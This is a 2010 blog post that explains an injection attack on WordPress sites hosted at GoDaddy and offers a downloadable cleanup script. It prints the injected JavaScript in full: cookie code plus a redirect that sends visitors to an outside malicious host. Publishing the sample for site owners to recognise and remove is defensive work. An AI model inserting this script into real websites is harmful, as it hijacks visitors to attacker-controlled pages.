Posted: May 12th, 2010 By: Devin Walker
Have you gotten calls from your clients hosted on GoDaddy about their WordPress site's being 'hacked'? Or perhaps this happened to you yourself. It seems there's a new report of thousands of WordPress sites being infected by malicious javascript inserted on their WordPress website.
It's not everyday that WordPress gets 'hacked' by something/one. Today one of my clients sent me a very distressed email claiming their site had been hacked. I thought that they were probably mistaken, but apparently not. It appears that a malicious piece of JavaScript is infecting WordPress sites. Most, if not all, hosted on WordPress. This WordPress infection by 'holasionweb.com' appears to set a cookie and has ill intentions. Let's take a look at what this attack is and how to fix it.
What WordPress Versions are Potentially Infected?
This has been seen on versions up to WordPress version 2.9.2.What Does it Do to My WordPress FrontEnd?
Nothing much, you may not see any change at all unless you have a virus protection program installed and a flag is raised by that software when you go to your site in the browser.What About the WordPress Admin Area?
This is where you will notice something has gone wrong. Take a look at this screenshot:
You can immediately tell there's something wrong here.
What Does the Malicious Code Look Like?
Here's a look at the malicious code:
function setCookie(c_name,value,expiredays){
var exdate=new Date();
exdate.setDate(exdate.getDate()+expiredays);
document.cookie=c_name+ "=" +escape(value)+
((expiredays==null) ? "" : ";expires="+exdate.toGMTString());
}
function getCookie(c_name){
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + "=");
if (c_start!=-1)
{
c_start=c_start + c_name.length+1;
c_end=document.cookie.indexOf(";",c_start);
if (c_end==-1) c_end=document.cookie.length;
return unescape(document.cookie.substring(c_start,c_end));
}
}
return "";
}
var name=getCookie("pma_visited_theme1");
if (name==""){
setCookie("pma_visited_theme1","1",20);
var url="http://www4.suitcase52td.net/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG2dXseYlWibZmeWmQ%3D%3D";
window.top.location.replace(url);
}else{
}
Take a look at the script above, this is the problem.
Ok, So How Do I Fix the 'HolasionWeb' WordPress GoDaddy Issue?!
Download this fix that will detect the script on your site and get rid of it: Download HoliasionWeb.com Malicious Script WordPress Fix
Instructions for running the WordPress hack fix
- Unzip and Upload the php file via FTP to your home directory
- Navigate your browser to http://mywebsite.com/wordpress-fix.php where 'mywebsite' is your domain to start the fix note: the fix may take a few minutes to run
- When it says complete, check to see if it's actually fixed and you're good to go!
Lesson Here: Do Not Host with Go Daddy!
They are insecure, unreliable and have terrible support.Related posts:
- Link separators for wp_list_pages() code snippet WordPress makes it very easy to dynamically create menus from pages and categories with the use of the function wp_list_pages() and wp_list_cats()... but what if you want to have separators in your menus? Here's a bit of code that will do just that: wp_list_pages Separators Please note: I got this code from Rares Comes (very [...]...
- WordPress List Subpages Even if On Subpage I'm building a new site and the navigation on it requires me to use a different bit of code for parent and child pages. I thought I'd share the code for those out there building a similar navigation. Here's a handy bit of code that you can use to display all subpages on a subpage. [...]...
- WordPress Loop: If Parent or Child of Page or Category The WordPress loop is extremely useful when developing customized WordPress solutions. One bit of code I've had to use often is one that will display a set of code if the page or post is a parent of child of a certain category. This is an easy way to display, output, or show data on [...]...
- WordPress Lavalamp Navigation Tutorial Lavalamp is an awesome jQuery plug-in that makes really cool effects for WordPress-based menus and navigation links, and as a bonus it is very lightweight. It can be a bit tricky to implement in WordPress, but after you read this tutorial hopefully you'll be implementing it with ease. Follow along and let's get your site's [...]...
- WordPress Fix: Attribute “role” is not a valid attribute I like to design websites that are W3C Compliant. Your WordPress theme may require some tweaking to be valid. One error I kept receiving was: Attribute "role" is not a valid attribute. Did you mean "frameborder" or "scrolling"? I will show you how to correct this error. Simply put, to correct the error we are [...]...
-
http://doohub.com/?p=31 Doohub blog » Blog Archive » malwere holasionweb.com
-
http://www.archifunk.com Nick
-
http://www.klinkoo.com Eric Sebastien
-
http://www.gigathoughts.com Amit Desai
-
http:/www.dlocc.com Devin Walker
-
Mark
-
Z
-
http:/www.dlocc.com Devin Walker
-
http://www.indiabroadband.net/web-hosting/29943-anyone-knows-about-domain-registration-charges-india.html#post309439 Anyone knows about domain registration charges in India?
